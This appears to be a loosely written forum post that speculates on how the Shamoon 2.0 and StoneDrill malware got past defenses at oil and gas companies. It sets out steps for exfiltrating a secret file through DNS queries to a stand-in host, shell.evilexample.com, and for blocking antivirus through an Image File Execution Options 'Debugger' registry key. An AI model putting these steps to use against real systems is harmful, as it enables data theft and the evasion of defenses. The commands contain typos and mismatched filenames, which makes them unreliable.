Patrick Jane is a fictional character and the protagonist of the CBS crime drama The Mentalist, Jane is an independent consultant. It looks that sound likes you can me in Cyber world. Ha Ha. The most interested Cyber security topics past two days is the destructive malware dubbed StoneDrill. Since the incident happened end of last year (2016). But this news allowed to expose to the world few days ago! The Famous antivirus vendor (Kaspersky Lab) analysis all the incident details and provides the detective control to the world. In our view point, all the information can research on internet. But the difficult ways is what is the infection technique on this incident. I believed that security expertise likes Kaspersky Lab and FireEye know more information but it can’t release to public. Since we are in the discussion forum. There is no harm to become a actor in this moment. Ok, my friends. We are now Patrick Jane. Let’s to start the journey.
Shamoon 2.0 and StoneDrill background:
Shamoon 2.0 and StoneDrill are developed by different hacker groups. The finger print ( keyboard layout and the ID) found in the malware source code look likes a proof of identification. For Shamon 2.0 , Yemen language set was found (ID: 9217 i.e.Arabic -Yemen [ar] (ar-ye)). But the StoneDrill embeds mostly Persian resource language.
Common attack target criteria:
Platform: Most likely is a Microsoft Window OS of machines.
Victim: Targeting oil and gas companies in the Middle East and also aiming towards targets in Europe, Kaspersky said.
Imaginations – How malware fool the oil and gas company defense mechanism.
We assumed that both oil and gas company install antivirus program , Malware detector and end point content filtering (Websense and Bluecoat). But how come to let attacker implant malware to the hosts?
Found PowerShell activities (Shamoon 2)
Since the usage of powershell in windows OS platform is common today. Powershell looks like a accomplice.There are a lot of ways to avoid detection.
DNS queries received powershell command. A unique attack called DNSMessenger uses DNS queries to carry out malicious PowerShell commands on compromised computers. The function likes RAT. This technique makes difficult to detect onto targeted systems.
File transfer via DNS 1. convert the file to be transferred via tshark into a hex stream.
Command - (xxd -p secret > file.hex)2. Read each line from file.hex, and "transmit" it as a DNS query.
Command - (for b in `cat file.hex `; do dig $b.shell.evilexample.com; done)3. On the DNS server, we can capture the messages via tcpdump or the query log.
Command - (tcdpump -w /tmp/dns -s0 port 53 and host system.example.com)4. Extract the messages from the packet capture Command - (
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt) 5. Reverse the hex encoding Command: (
xxd -r -p < receivedu.txt > keys.pgp) Done. Hey man, File transfer via DNS you are done!
Disable Anti-Virus via Debugger Setting 1. Run regedit.exe 2. Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options 3. Create a new key (example: calc.exe) 4. Create a new string value under your exe. The name of the string value is ‘Debugger’, and the value is svchost.exe (or anything)
Seems our Patrick Jane life stop here! Ha Ha, it is interesting, right? It looks that more technique can be used today to fool the defense mechanism. As said, this is only my imagination, it is a concept. A virtual scenario replay to detect what is the possible way on this malware incident. Ok, see you!